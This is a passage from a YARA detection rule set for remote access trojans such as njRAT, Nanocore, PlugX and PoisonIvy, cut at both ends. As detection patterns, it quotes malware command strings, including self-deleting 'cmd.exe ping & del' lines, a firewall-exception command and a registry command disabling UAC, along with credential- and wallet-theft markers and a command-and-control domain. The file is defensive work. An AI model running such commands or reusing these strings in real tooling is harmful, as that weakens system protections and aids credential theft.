}

rule Nanocore_RAT_Gen_1 {
  meta:
    description = "Detetcs the Nanocore RAT and similar malware"
    author = "Florian Roth"
    reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
    date = "2016-04-22"
    score = 70
    hash1 = "e707a7745e346c5df59b5aa4df084574ae7c204f4fb7f924c0586ae03b79bf06"
  strings:
    $x1 = "C:\\Users\\Logintech\\Dropbox\\Projects\\New folder\\Latest\\Benchmark\\Benchmark\\obj\\Release\\Benchmark.pdb" ascii fullword
    $x2 = "RunPE1" ascii fullword
    $x3 = "082B8C7D3F9105DC66A7E3267C9750CF43E9D325" ascii fullword
    $x4 = "$374e0775-e893-4e72-806c-a8d880a49ae7" ascii fullword
    $x5 = "Monitorinjection" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 102400 and (1 of them)) or (3 of them)
}

rule Nanocore_RAT_Gen_2 {
  meta:
    description = "Detetcs the Nanocore RAT"
    author = "Florian Roth"
    score = 100
    reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
    date = "2016-04-22"
    hash1 = "755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050"
  strings:
    $x1 = "NanoCore.ClientPluginHost" ascii fullword
    $x2 = "IClientNetworkHost" ascii fullword
    $x3 = "#=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 1024000 and 1 of them) or (all of them)
}

rule Nanocore_RAT_Sample_1 {
  meta:
    description = "Detetcs a certain Nanocore RAT sample"
    author = "Florian Roth"
    score = 75
    reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
    date = "2016-04-22"
    hash2 = "b7cfc7e9551b15319c068aae966f8a9ff563b522ed9b1b42d19c122778e018c8"
  strings:
    $x1 = "TbSiaEdJTf9m1uTnpjS.n9n9M7dZ7FH9JsBARgK" wide fullword
    $x2 = "1EF0D55861681D4D208EC3070B720C21D885CB35" ascii fullword
    $x3 = "popthatkitty.Resources.resources" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 921600 and (1 of ($x*))) or (all of them)
}

rule Nanocore_RAT_Sample_2 {
  meta:
    description = "Detetcs a certain Nanocore RAT sample"
    author = "Florian Roth"
    score = 75
    reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
    date = "2016-04-22"
    hash1 = "51142d1fb6c080b3b754a92e8f5826295f5da316ec72b480967cbd68432cede1"
  strings:
    $s1 = "U4tSOtmpM" ascii fullword
    $s2 = ")U71UDAU_QU_YU_aU_iU_qU_yU_" wide fullword
    $s3 = "Cy4tOtTmpMtTHVFOrR" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 40960 and all of ($s*)
}

rule NetWiredRC_B : RAT {
  meta:
    description = "NetWiredRC"
    author = "Jean-Philippe Teissier / @Jipe_"
    date = "2014-12-23"
    filetype = "memory"
    version = "1.1"
  strings:
    $mutex = "LmddnIkX"
    $str1 = "%s.Identifier"
    $str2 = "%d:%I64u:%s%s;"
    $str3 = "%s%.2d-%.2d-%.4d"
    $str4 = "[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]"
    $str5 = "%.2d/%.2d/%d %.2d:%.2d:%.2d"
    $klg1 = "[Backspace]"
    $klg2 = "[Enter]"
    $klg3 = "[Tab]"
    $klg4 = "[Arrow Left]"
    $klg5 = "[Arrow Up]"
    $klg6 = "[Arrow Right]"
    $klg7 = "[Arrow Down]"
    $klg8 = "[Home]"
    $klg9 = "[Page Up]"
    $klg10 = "[Page Down]"
    $klg11 = "[End]"
    $klg12 = "[Break]"
    $klg13 = "[Delete]"
    $klg14 = "[Insert]"
    $klg15 = "[Print Screen]"
    $klg16 = "[Scroll Lock]"
    $klg17 = "[Caps Lock]"
    $klg18 = "[Alt]"
    $klg19 = "[Esc]"
    $klg20 = "[Ctrl+%c]"
  condition:
    $mutex or (1 of ($str*) and 1 of ($klg*))
}

rule Njrat : RAT {
  meta:
    description = "Njrat"
    author = "botherder https://github.com/botherder"
  strings:
    $string1 = /(F)romBase64String/
    $string2 = /(B)ase64String/
    $string3 = /(C)onnected/ ascii wide
    $string4 = /(R)eceive/
    $string5 = /(S)end/ ascii wide
    $string6 = /(D)ownloadData/ ascii wide
    $string7 = /(D)eleteSubKey/ ascii wide
    $string8 = /(g)et_MachineName/
    $string9 = /(g)et_UserName/
    $string10 = /(g)et_LastWriteTime/
    $string11 = /(G)etVolumeInformation/
    $string12 = /(O)SFullName/ ascii wide
    $string13 = /(n)etsh firewall/ wide
    $string14 = /(c)md\.exe \/k ping 0 & del/ wide
    $string15 = /(c)md\.exe \/c ping 127\.0\.0\.1 & del/ wide
    $string16 = /(c)md\.exe \/c ping 0 -n 2 & del/ wide
    $string17 = { 7C 00 27 00 7C 00 27 00 7C }
  condition:
    10 of them
}

rule njrat1 : RAT {
  meta:
    author = "Brian Wallace @botnet_hunter"
    author_email = "bwall@ballastsecurity.net"
    date = "2015-05-27"
    description = "Identify njRat"
  strings:
    $a1 = "netsh firewall add allowedprogram " wide
    $a2 = "SEE_MASK_NOZONECHECKS" wide
    $b1 = "[TAP]" wide
    $b2 = " & exit" wide
    $c1 = "md.exe /k ping 0 & del " wide
    $c2 = "cmd.exe /c ping 127.0.0.1 & del" wide
    $c3 = "cmd.exe /c ping" wide
  condition:
    1 of ($a*) and 1 of ($b*) and 1 of ($c*)
}

rule win_exe_njRAT {
  meta:
    author = "info@fidelissecurity.com"
    descripion = "njRAT - Remote Access Trojan"
    comment = "Variants have also been observed obfuscated with .NET Reactor"
    filetype = "pe"
    date = "2013-07-15"
    version = "1.0"
    hash1 = "92ee1fb5df21d8cfafa2b02b6a25bd3b"
    hash2 = "3576d40ce18bb0349f9dfa42b8911c3a"
    hash3 = "24cc5b811a7f9591e7f2cb9a818be104"
    hash4 = "3ad5fded9d7fdf1c2f6102f4874b2d52"
    hash5 = "a98b4c99f64315aac9dd992593830f35"
    hash6 = "5fcb5282da1a2a0f053051c8da1686ef"
    hash7 = "a669c0da6309a930af16381b18ba2f9d"
    hash8 = "79dce17498e1997264346b162b09bde8"
    hash9 = "fc96a7e27b1d3dab715b2732d5c86f80"
    ref1 = "http://bit.ly/19tlf4s"
    ref2 = "http://www.fidelissecurity.com/threatadvisory"
    ref3 = "http://www.threatgeek.com/2013/06/fidelis-threat-advisory-1009-njratuncovered.html"
    ref4 = "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered.pdf"
  strings:
    $magic = "MZ"
    $string_setA_1 = "FromBase64String"
    $string_setA_2 = "Base64String"
    $string_setA_3 = "Connected" ascii wide
    $string_setA_4 = "Receive"
    $string_setA_5 = "DeleteSubKey" ascii wide
    $string_setA_6 = "get_MachineName"
    $string_setA_7 = "get_UserName"
    $string_setA_8 = "get_LastWriteTime"
    $string_setA_9 = "GetVolumeInformation"
    $string_setB_1 = "OSFullName" ascii wide
    $string_setB_2 = "Send" ascii wide
    $string_setB_3 = "Connected" ascii wide
    $string_setB_4 = "DownloadData" ascii wide
    $string_setB_5 = "netsh firewall" wide
    $string_setB_6 = "cmd.exe /k ping 0 & del" wide
  condition:
    ($magic at 0) and (all of ($string_setA*) or all of ($string_setB*))
}

rule network_traffic_njRAT {
  meta:
    author = "info@fidelissecurity.com"
    descripion = "njRAT - Remote Access Trojan"
    comment = "Rule to alert on network traffic indicators"
    filetype = "PCAP - Network Traffic"
    date = "2013-07-15"
    version = "1.0"
    hash1 = "92ee1fb5df21d8cfafa2b02b6a25bd3b"
    hash2 = "3576d40ce18bb0349f9dfa42b8911c3a"
    hash3 = "24cc5b811a7f9591e7f2cb9a818be104"
    hash4 = "3ad5fded9d7fdf1c2f6102f4874b2d52"
    hash5 = "a98b4c99f64315aac9dd992593830f35"
    hash6 = "5fcb5282da1a2a0f053051c8da1686ef"
    hash7 = "a669c0da6309a930af16381b18ba2f9d"
    hash8 = "79dce17498e1997264346b162b09bde8"
    hash9 = "fc96a7e27b1d3dab715b2732d5c86f80"
    ref1 = "http://bit.ly/19tlf4s"
    ref2 = "http://www.fidelissecurity.com/threatadvisory"
    ref3 = "http://www.threatgeek.com/2013/06/fidelis-threat-advisory-1009-njrat-uncovered.html"
    ref4 = "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered.pdf"
  strings:
    $string1 = "FM|'|'|"
    $string2 = "nd|'|'|"
    $string3 = "rn|'|'|"
    $string4 = "sc~|'|'|"
    $string5 = "scPK|'|'|"
    $string6 = "CAM|'|'|"
    $string7 = "USB Video Device[endof]"
    $string8 = "rs|'|'|"
    $string9 = "proc|'|'|"
    $string10 = "k|'|'|"
    $string11 = "RG|'|'|~|'|'|"
    $string12 = "kl|'|'|"
    $string13 = "ret|'|'|"
    $string14 = "pl|'|'|"
    $string15 = "lv|'|'|"
    $string16 = "prof|'|'|~|'|'|"
    $string17 = "un|'|'|~[endof]"
    $idle_string = "P[endof]"
  condition:
    any of ($string*) or #idle_string > 4
}

rule RAT_Orcus {
  meta:
    author = " J from THL <j@techhelplist.com> with thx to MalwareHunterTeam"
    date = "2017/01"
    reference = "https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/"
    version = 1
    maltype = "RAT"
    filetype = "memory"
  strings:
    $text01 = "Orcus.CommandManagement"
    $text02 = "Orcus.Commands."
    $text03 = "Orcus.Config."
    $text04 = "Orcus.Connection."
    $text05 = "Orcus.Core."
    $text06 = "Orcus.exe"
    $text07 = "Orcus.Extensions."
    $text08 = "Orcus.InstallationPromptForm"
    $text09 = "Orcus.MainForm."
    $text10 = "Orcus.Native."
    $text11 = "Orcus.Plugins."
    $text12 = "orcus.plugins.dll"
    $text13 = "Orcus.Properties."
    $text14 = "Orcus.Protection."
    $text15 = "Orcus.Share."
    $text16 = "Orcus.Shared"
    $text17 = "Orcus.StaticCommands"
    $text18 = "Orcus.Utilities."
    $text19 = "\\Projects\\Orcus\\Source\\Orcus."
    $text20 = ".orcus.plugins.dll.zip"
    $text21 = ".orcus.shared.dll.zip"
    $text22 = ".orcus.shared.utilities.dll.zip"
    $text23 = ".orcus.staticcommands.dll.zip"
    $text24 = "HvncCommunication"
    $text25 = "HvncAction"
    $text26 = "hvncDesktop"
    $text27 = ".InstallationPromptForm"
    $text28 = "RequestKeyLogCommand"
    $text29 = "get_KeyLogFile"
    $text30 = "LiveKeyloggerCommand"
    $text31 = "ORCUS.STATICCOMMANDS, VERSION="
    $text32 = "PrepareOrcusFileToRemove"
    $text33 = "ConvertFromOrcusValueKind"
  condition:
    13 of them
}

rule PlugXStrings : PlugX Family {
  meta:
    description = "PlugX Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-06-12"
  strings:
    $BootLDR = "boot.ldr" ascii wide
    $Dwork = "d:\\work" nocase
    $Plug25 = "plug2.5"
    $Plug30 = "Plug3.0"
    $Shell6 = "Shell6"
  condition:
    $BootLDR or ($Dwork and ($Plug25 or $Plug30 or $Shell6))
}

rule plugX : rat {
  meta:
    author = "Jean-Philippe Teissier / @Jipe_"
    description = "PlugX RAT"
    date = "2014-05-13"
    filetype = "memory"
    version = "1.0"
    ref1 = "https://github.com/mattulm/IR-things/blob/master/volplugs/plugx.py"
  strings:
    $v1a = { 47 55 4C 50 00 00 00 00 }
    $v1b = "/update?id=%8.8x"
    $v1algoa = { BB 33 33 33 33 2B }
    $v1algob = { BB 44 44 44 44 2B }
    $v2a = "Proxy-Auth:"
    $v2b = { 68 A0 02 00 00 }
    $v2k = { C1 8F 3A 71 }
  condition:
    $v1a at 0 or $v1b or (($v2a or $v2b) and (($v1algoa and $v1algob) or $v2k))
}

rule PlugX_mw {
  meta:
    maltype = "plugX"
    author = "https://github.com/reed1713"
    reference = "http://www.fireeye.com/blog/technical/targeted-attack/2014/02/operation-greedywonk-multiple-economic-and-foreign-policy-sites-compromised-serving-up-flash-zero-day-exploit.html"
    description = "Malware creates a randomized directory within the appdata roaming directory and launches the malware. Should see multiple events for create process rundll32.exe and iexplorer.exe as it repeatedly uses iexplorer to launch the rundll32 process."
  strings:
    $type = "Microsoft-Windows-Security-Auditing"
    $eventid = "4688"
    $data = /\\AppData\\Roaming\\[0-9]{9,12}\VMwareCplLauncher\.exe/
    $type1 = "Microsoft-Windows-Security-Auditing"
    $eventid1 = "4688"
    $data1 = "\\Windows\\System32\\rundll32.exe"
    $type2 = "Microsoft-Windows-Security-Auditing"
    $eventid2 = "4688"
    $data2 = "Program Files\\Internet Explorer\\iexplore.exe"
  condition:
    all of them
}

rule PoetRat_Doc {
  meta:
    Author = "Nishan Maharjan"
    Description = "A yara rule to catch PoetRat Word Document"
    Data = "6th May 2020"
  strings:
    $pythonRegEx = /(\.py$|\.pyc$|\.pyd$|Python)/
    $pythonFile1 = "launcher.py"
    $zipFile = "smile.zip"
    $pythonFile2 = "smile_funs.py"
    $pythonFile3 = "frown.py"
    $pythonFile4 = "backer.py"
    $pythonFile5 = "smile.py"
    $pythonFile6 = "affine.py"
    $dlls = /\.dll/
    $cmd = "cmd"
    $exe = ".exe"
  condition:
    all of them
}

rule PoetRat_Python {
  meta:
    Author = "Nishan Maharjan"
    Description = "A yara rule to catch PoetRat python scripts"
    Data = "6th May 2020"
  strings:
    $encrptionFunction = "Affine"
    $commands = /version|ls|cd|sysinfo|download|upload|shot|cp|mv|link|register|hid|compress|jobs|exit|tasklist|taskkill/
    $domain = "dellgenius.hopto.org"
    $grammer_massacre = /BADD|Bad Error Happened|/
    $mayBePresent = /self\.DIE|THE_GUID_KEY/
    $pipe_out = "Abibliophobia23"
    $shot = "shot_{0}_{1}.png"
  condition:
    5 of them
}

rule poisonivy_1 : rat {
  meta:
    description = "Poison Ivy"
    author = "Jean-Philippe Teissier / @Jipe_"
    date = "2013-02-01"
    filetype = "memory"
    version = "1.0"
    ref1 = "https://code.google.com/p/volatility/source/browse/trunk/contrib/plugins/malware/poisonivy.py"
  strings:
    $a = { 53 74 75 62 50 61 74 68 ?? 53 4F 46 54 57 41 52 45 5C 43 6C 61 73 73 65 73 5C 68 74 74 70 5C 73 68 65 6C 6C 5C 6F 70 65 6E 5C 63 6F 6D 6D 61 6E 64 [22] 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 41 63 74 69 76 65 20 53 65 74 75 70 5C 49 6E 73 74 61 6C 6C 65 64 20 43 6F 6D 70 6F 6E 65 6E 74 73 5C }
  condition:
    $a
}

rule PoisonIvy_Generic_3 {
  meta:
    description = "PoisonIvy RAT Generic Rule"
    author = "Florian Roth"
    date = "2015-05-14"
    hash = "e1cbdf740785f97c93a0a7a01ef2614be792afcd"
  strings:
    $k1 = "Tiger324{" ascii fullword
    $s2 = "WININET.dll" ascii fullword
    $s3 = "mscoree.dll" wide fullword
    $s4 = "WS2_32.dll" fullword
    $s5 = "Explorer.exe" wide fullword
    $s6 = "USER32.DLL"
    $s7 = "CONOUT$"
    $s8 = "login.asp"
    $h1 = "HTTP/1.0"
    $h2 = "POST"
    $h3 = "login.asp"
    $h4 = "check.asp"
    $h5 = "result.asp"
    $h6 = "upload.asp"
  condition:
    uint16(0) == 23117 and filesize < 512000 and ($k1 or all of ($s*) or all of ($h*))
}

rule PoisonIvy_2 {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/PoisonIvy"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $stub = { 04 08 00 53 74 75 62 50 61 74 68 18 04 }
    $string1 = "CONNECT %s:%i HTTP/1.0"
    $string2 = "ws2_32"
    $string3 = "cks=u"
    $string4 = "thj@h"
    $string5 = "advpack"
  condition:
    $stub at 5664 and all of ($string*) or (all of them)
}

rule AAR : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/AAR"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $a = "Hashtable"
    $b = "get_IsDisposed"
    $c = "TripleDES"
    $d = "testmemory.FRMMain.resources"
    $e = "$this.Icon" wide
    $f = "{11111-22222-20001-00001}" wide
    $g = "@@@@@"
  condition:
    all of them
}

rule Ap0calypse : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/Ap0calypse"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $a = "Ap0calypse"
    $b = "Sifre"
    $c = "MsgGoster"
    $d = "Baslik"
    $e = "Dosyalars"
    $f = "Injecsiyon"
  condition:
    all of them
}

rule Arcom : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/Arcom"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $a1 = "CVu3388fnek3W(3ij3fkp0930di"
    $a2 = "ZINGAWI2"
    $a3 = "clWebLightGoldenrodYellow"
    $a4 = "Ancestor for '%s' not found" wide
    $a5 = "Control-C hit" wide
    $a6 = { A3 24 25 21 }
  condition:
    all of them
}

rule Bandook : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/bandook"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $a = "aaaaaa1|"
    $b = "aaaaaa2|"
    $c = "aaaaaa3|"
    $d = "aaaaaa4|"
    $e = "aaaaaa5|"
    $f = "%s%d.exe"
    $g = "astalavista"
    $h = "givemecache"
    $i = "%s\\system32\\drivers\\blogs\\*"
    $j = "bndk13me"
  condition:
    all of them
}

rule BlackNix : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/BlackNix"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $a1 = "SETTINGS" wide
    $a2 = "Mark Adler"
    $a3 = "Random-Number-Here"
    $a4 = "RemoteShell"
    $a5 = "SystemInfo"
  condition:
    all of them
}

rule BlueBanana : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/BlueBanana"
    maltype = "Remote Access Trojan"
    filetype = "Java"
  strings:
    $meta = "META-INF"
    $conf = "config.txt"
    $a = "a/a/a/a/f.class"
    $b = "a/a/a/a/l.class"
    $c = "a/a/a/b/q.class"
    $d = "a/a/a/b/v.class"
  condition:
    all of them
}

rule ClientMesh : RAT {
  meta:
    author = "Kevin Breen <kevin@techanarchy.net>"
    date = "2014/06"
    ref = "http://malwareconfig.com/stats/ClientMesh"
    family = "torct"
  strings:
    $string1 = "machinedetails"
    $string2 = "MySettings"
    $string3 = "sendftppasswords"
    $string4 = "sendbrowserpasswords"
    $string5 = "arma2keyMass"
    $string6 = "keylogger"
    $conf = { 00 00 00 00 00 00 00 00 00 7E }
  condition:
    all of them
}

rule DarkRAT : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/DarkRAT"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $a = "@1906dark1996coder@"
    $b = "SHEmptyRecycleBinA"
    $c = "mciSendStringA"
    $d = "add_Shutdown"
    $e = "get_SaveMySettingsOnExit"
    $f = "get_SpecialDirectories"
    $g = "Client.My"
  condition:
    all of them
}

rule Greame : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/Greame"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $a = { 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23 }
    $b = { 23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23 }
    $c = "EditSvr"
    $d = "TLoader"
    $e = "Stroks"
    $f = "Avenger by NhT"
    $g = "####@####"
    $h = "GREAME"
  condition:
    all of them
}

rule HawkEye : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2015/06"
    ref = "http://malwareconfig.com/stats/HawkEye"
    maltype = "KeyLogger"
    filetype = "exe"
  strings:
    $key = "HawkEyeKeylogger" wide
    $salt = "099u787978786" wide
    $string1 = "HawkEye_Keylogger" wide
    $string2 = "holdermail.txt" wide
    $string3 = "wallet.dat" wide
    $string4 = "Keylog Records" wide
    $string5 = "<!-- do not script -->" wide
    $string6 = "\\pidloc.txt" wide
    $string7 = "BSPLIT" wide
  condition:
    $key and $salt and all of ($string*)
}

rule Imminent : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/Imminent"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $v1a = "DecodeProductKey"
    $v1b = "StartHTTPFlood"
    $v1c = "CodeKey"
    $v1d = "MESSAGEBOX"
    $v1e = "GetFilezillaPasswords"
    $v1f = "DataIn"
    $v1g = "UDPzSockets"
    $v1h = { 52 00 54 00 5F 00 52 00 43 00 44 00 41 00 54 00 41 }
    $v2a = "<URL>k__BackingField"
    $v2b = "<RunHidden>k__BackingField"
    $v2c = "DownloadAndExecute"
    $v2d = "-CHECK & PING -n 2 127.0.0.1 & EXIT" wide
    $v2e = "england.png" wide
    $v2f = "Showed Messagebox" wide
  condition:
    all of ($v1*) or all of ($v2*)
}

rule Infinity : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/Infinity"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $a = "CRYPTPROTECT_PROMPTSTRUCT"
    $b = "discomouse"
    $c = "GetDeepInfo"
    $d = "AES_Encrypt"
    $e = "StartUDPFlood"
    $f = "BATScripting" wide
    $g = "FBqINhRdpgnqATxJ.html" wide
    $i = "magic_key" wide
  condition:
    all of them
}

rule JavaDropper : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2015/10"
    ref = "http://malwareconfig.com/stats/AlienSpy"
    maltype = "Remote Access Trojan"
    filetype = "jar"
  strings:
    $jar = "META-INF/MANIFEST.MF"
    $a1 = "ePK"
    $a2 = "kPK"
    $b1 = "config.ini"
    $b2 = "password.ini"
    $c1 = "stub/stub.dll"
    $d1 = "c.dat"
  condition:
    $jar and (all of ($a*) or all of ($b*) or all of ($c*) or all of ($d*))
}

rule LostDoor : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/LostDoor"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $a0 = { 0D 0A 2A 45 44 49 54 5F 53 45 52 56 45 52 2A 0D 0A }
    $a1 = "*mlt* = %"
    $a2 = "*ip* = %"
    $a3 = "*victimo* = %"
    $a4 = "*name* = %"
    $b5 = "[START]"
    $b6 = "[DATA]"
    $b7 = "We Control Your Digital World" ascii wide
    $b8 = "RC4Initialize" ascii wide
    $b9 = "RC4Decrypt" ascii wide
  condition:
    all of ($a*) or all of ($b*)
}

rule LuminosityLink : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/LuminosityLink"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $a = "SMARTLOGS" wide
    $b = "RUNPE" wide
    $c = "b.Resources" wide
    $d = "CLIENTINFO*" wide
    $e = "Invalid Webcam Driver Download URL, or Failed to Download File!" wide
    $f = "Proactive Anti-Malware has been manually activated!" wide
    $g = "REMOVEGUARD" wide
    $h = "C0n1f8" wide
    $i = "Luminosity" wide
    $j = "LuminosityCryptoMiner" wide
    $k = "MANAGER*CLIENTDETAILS*" wide
  condition:
    all of them
}

rule LuxNet : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/LuxNet"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $a = "GetHashCode"
    $b = "Activator"
    $c = "WebClient"
    $d = "op_Equality"
    $e = "dickcursor.cur" wide
    $f = "{0}|{1}|{2}" wide
  condition:
    all of them
}

rule NanoCore : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/NanoCore"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $a = "NanoCore"
    $b = "ClientPlugin"
    $c = "ProjectData"
    $d = "DESCrypto"
    $e = "KeepAlive"
    $f = "IPNETROW"
    $g = "LogClientMessage"
    $h = "|ClientHost"
    $i = "get_Connected"
    $j = "#=q"
    $key = { 43 6F 24 CB 95 30 38 39 }
  condition:
    6 of them
}

rule Paradox : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/Paradox"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $a = "ParadoxRAT"
    $b = "Form1"
    $c = "StartRMCam"
    $d = "Flooders"
    $e = "SlowLaris"
    $f = "SHITEMID"
    $g = "set_Remote_Chat"
  condition:
    all of them
}

rule Plasma : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/Plasma"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $a = "Miner: Failed to Inject." wide
    $b = "Started GPU Mining on:" wide
    $c = "BK: Hard Bot Killer Ran Successfully!" wide
    $d = "Uploaded Keylogs Successfully!" wide
    $e = "No Slowloris Attack is Running!" wide
    $f = "An ARME Attack is Already Running on" wide
    $g = "Proactive Bot Killer Enabled!" wide
    $h = "PlasmaRAT" ascii wide
    $i = "AntiEverything" ascii wide
  condition:
    all of them
}

rule PredatorPain : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/PredatorPain"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $string1 = "holderwb.txt" wide
    $string3 = "There is a file attached to this email" wide
    $string4 = "screens\\screenshot" wide
    $string5 = "Disablelogger" wide
    $string6 = "\\pidloc.txt" wide
    $string7 = "clearie" wide
    $string8 = "clearff" wide
    $string9 = "emails should be sent to you shortly" wide
    $string10 = "jagex_cache\\regPin" wide
    $string11 = "open=Sys.exe" wide
    $ver1 = "PredatorLogger" wide
    $ver2 = "EncryptedCredentials" wide
    $ver3 = "Predator Pain" wide
  condition:
    7 of ($string*) and any of ($ver*)
}

rule Punisher : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/Punisher"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $a = "abccba"
    $b = { 5C 00 68 00 66 00 68 00 2E 00 76 00 62 00 73 }
    $c = { 5C 00 73 00 63 00 2E 00 76 00 62 00 73 }
    $d = "SpyTheSpy" ascii wide
    $e = "wireshark" wide
    $f = "apateDNS" wide
    $g = "abccbaDanabccb"
  condition:
    all of them
}

rule PythoRAT : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/PythoRAT"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $a = "TKeylogger"
    $b = "uFileTransfer"
    $c = "TTDownload"
    $d = "SETTINGS"
    $e = "Unknown" wide
    $f = "#@#@#"
    $g = "PluginData"
    $i = "OnPluginMessage"
  condition:
    all of them
}

rule QRat : RAT {
  meta:
    author = "Kevin Breen @KevTheHermit"
    date = "2015/08"
    ref = "http://malwareconfig.com"
    maltype = "Remote Access Trojan"
    filetype = "jar"
  strings:
    $a0 = "e-data"
    $a1 = "quaverse/crypter"
    $a2 = "Qrypt.class"
    $a3 = "Jarizer.class"
    $a4 = "URLConnection.class"
  condition:
    4 of them
}

rule SmallNet : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/SmallNet"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $split1 = "!!<3SAFIA<3!!"
    $split2 = "!!ElMattadorDz!!"
    $a1 = "stub_2.Properties"
    $a2 = "stub.exe" wide
    $a3 = "get_CurrentDomain"
  condition:
    ($split1 or $split2) and (all of ($a*))
}

rule SpyGate : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/SpyGate"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $split = "abccba"
    $a1 = "abccbaSpyGateRATabccba"
    $a2 = "StubX.pdb"
    $a3 = "abccbaDanabccb"
    $b1 = "monikerString" nocase
    $b2 = "virustotal1"
    $b3 = "get_CurrentDomain"
    $c1 = "shutdowncomputer" wide
    $c2 = "shutdown -r -t 00" wide
    $c3 = "set cdaudio door closed" wide
    $c4 = "FileManagerSplit" wide
    $c5 = "Chating With >> [~Hacker~]" wide
  condition:
    (all of ($a*) and #split > 40) or (all of ($b*) and #split > 10) or (all of ($c*))
}

rule Sub7Nation : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/Sub7Nation"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $a = "EnableLUA /t REG_DWORD /d 0 /f"
    $b = "*A01*"
    $c = "*A02*"
    $d = "*A03*"
    $e = "*A04*"
    $f = "*A05*"
    $g = "*A06*"
    $h = "#@#@#"
    $i = "HostSettings"
